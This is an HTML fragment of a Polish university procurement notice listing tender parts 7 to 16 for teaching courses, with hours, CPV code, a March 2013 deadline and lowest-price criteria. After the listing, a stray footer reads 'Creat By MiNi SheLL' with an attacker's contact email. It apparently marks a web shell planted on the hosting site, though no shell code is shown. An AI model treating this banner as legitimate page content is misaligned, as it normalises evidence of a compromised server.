<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć z przedmiotu Lektorat Języka Serbskiego, specjalność Bałkanistyka, forma prowadzenia zajęć: lektorat. Liczba prowadzonych zajęć: 45 godzin x 2 grupy, (razem: 90 godzin) oraz przygotowanie kompletu materiałów dydaktycznych z zakresu prowadzonych zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Prowadzenie zajęć z przedmiotu Podstawy zapisu dźwięku, specjalność Kultura przekazu i techniki audiowizualne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć z przedmiotu Podstawy zapisu dźwięku, specjalność Kultura przekazu i techniki audiowizualne, forma prowadzenia zajęć: ćwiczenia stacjonarne. Liczba prowadzonych zajęć: 30 godzin oraz przygotowanie kompletu materiałów dydaktycznych z zakresu prowadzonych zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Prowadzenie zajęć z przedmiotu Podstawy wideozapisu, specjalność Kultura przekazu i techniki audiowizualne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć z przedmiotu Podstawy wideozapisu, specjalność Kultura przekazu i techniki audiowizualne, forma prowadzenia zajęć: ćwiczenia stacjonarne. Liczba prowadzonych zajęć: 30 godzin oraz przygotowanie kompletu materiałów dydaktycznych z zakresu prowadzonych zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Prowadzenie zajęć z przedmiotu Warsztaty audiowizualne, specjalność Kultura przekazu i techniki audiowizualne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć z przedmiotu Warsztaty audiowizualne, specjalność Kultura przekazu i techniki audiowizualne, 
forma prowadzenia zajęć: ćwiczenia stacjonarne. Liczba prowadzonych zajęć: 30 godzin oraz przygotowanie kompletu materiałów dydaktycznych z zakresu prowadzonych zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Prowadzenie zajęć z przedmiotu Historia i kultura wybranych mniejszości narodowych w Polsce (Litwini), specjalność Wielokulturowość w Polsce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć z przedmiotu Historia i kultura wybranych mniejszości narodowych w Polsce (Litwini), specjalność Wielokulturowość w Polsce, forma prowadzenia zajęć: ćwiczenia stacjonarne. Liczba prowadzonych zajęć: 15 godzin oraz przygotowanie kompletu materiałów dydaktycznych z zakresu prowadzonych zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Prowadzenie zajęć z przedmiotu Projekty społeczne na rzecz mniejszości narodowych w Polsce i w Europie, specjalność Wielokulturowość w Polsce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć z przedmiotu Projekty społeczne na rzecz mniejszości narodowych w Polsce i w Europie, specjalność Wielokulturowość w Polsce, forma prowadzenia zajęć: ćwiczenia stacjonarne. Liczba prowadzonych zajęć: 15 godzin oraz przygotowanie kompletu materiałów dydaktycznych z zakresu prowadzonych zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Prowadzenie zajęć z przedmiotu Instytucje kultury i polityka kulturalna, specjalność Zarządzanie w kulturze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć z przedmiotu Instytucje kultury i polityka kulturalna, specjalność Zarządzanie w kulturze, forma prowadzenia zajęć: ćwiczenia stacjonarne. Liczba prowadzonych zajęć: 15 godzin oraz przygotowanie kompletu materiałów dydaktycznych z zakresu prowadzonych zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Prowadzenie zajęć z przedmiotu Kultura jako kapitał i marka, specjalność Zarządzanie w kulturze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć z przedmiotu Kultura jako kapitał i marka, specjalność Zarządzanie w kulturze, 
forma prowadzenia zajęć: ćwiczenia stacjonarne. Liczba prowadzonych zajęć: 15 godzin oraz przygotowanie kompletu materiałów dydaktycznych z zakresu prowadzonych zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Prowadzenie zajęć z przedmiotu Historie performatywne, specjalność Przeszłość w mediach - mediatyzacja historii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć z przedmiotu Historie performatywne, specjalność Przeszłość w mediach - mediatyzacja historii, forma prowadzenia zajęć: ćwiczenia stacjonarne. Liczba prowadzonych zajęć: 30 godzin x 3 grupy, (razem: 90 godzin) oraz przygotowanie kompletu materiałów dydaktycznych z zakresu prowadzonych zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Prowadzenie zajęć z przedmiotu Elektroniczne narzędzia zarządzania danymi zarchiwizowanym, specjalność Zarządzanie danymi w instytucjach i firmach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć z przedmiotu Elektroniczne narzędzia zarządzania danymi zarchiwizowanym, specjalność Zarządzanie danymi w instytucjach i firmach, forma prowadzenia zajęć: ćwiczenia stacjonarne. Liczba prowadzonych zajęć: 30 godzin oraz przygotowanie kompletu materiałów dydaktycznych z zakresu prowadzonych zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Prowadzenie zajęć z przedmiotu Organizacja i obsługa ruchu turystycznego, specjalność Organizacja i funkcjonowanie turystyki w regionie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć z przedmiotu Organizacja i obsługa ruchu turystycznego, specjalność Organizacja i funkcjonowanie turystyki w regionie, forma prowadzenia zajęć: ćwiczenia stacjonarne. Liczba prowadzonych zajęć: 15 godzin oraz przygotowanie kompletu materiałów dydaktycznych z zakresu prowadzonych zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com